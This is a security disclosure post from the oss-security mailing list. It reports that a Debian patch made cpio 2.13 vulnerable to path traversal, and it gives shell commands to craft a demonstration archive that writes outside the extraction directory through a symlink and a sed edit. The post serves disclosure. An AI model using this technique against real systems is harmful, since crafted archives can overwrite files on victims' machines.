|
Message-ID: <65846ba9.7d4fbb18.bm000@oddnet.de> Date: Thu, 21 Dec 2023 17:44:50 +0100 From: Ingo Brückl <ib@...net.de> To: oss-security@...ts.openwall.com Subject: Security vulnerability in Debian's cpio 2.13 Debian has applied patch "revert-CVE-2015-1197-handling" to cpio (2.13+dfsg-7.1) to "Fix a regression in handling of CVE-2015-1197 & --no-absolute-filenames by reverting part of an upstream commit." and to close Debian bugs #946267 ("cpio -i --no-absolute-filenames breaks symlinks starting with / or /..") and #946469 ("initramfs-tools-core: unmkinitrams creates broken binaries"). This patch made Debian cpio 2.13 vulnerable to path traversal. The vulnerability has been reported to the Debian bug tracking system: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1059163 Instructions to craft a cpio archive to demonstrate the vulnerability: mkdir test_cpio ln -sf /tmp/ test_cpio/tmp echo "TEST Traversal" > test_cpio/tmpYtrav.txt cd test_cpio/ ls | cpio -ov > ../trav.cpio cd ../ sed -i s/"tmpY"/"tmp\/"/g trav.cpio Even cpio -id --no-absolute-filenames -I trav.cpio doesn't prevent path traversal with Debian's cpio, although it does with the original cpio. Ingo
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.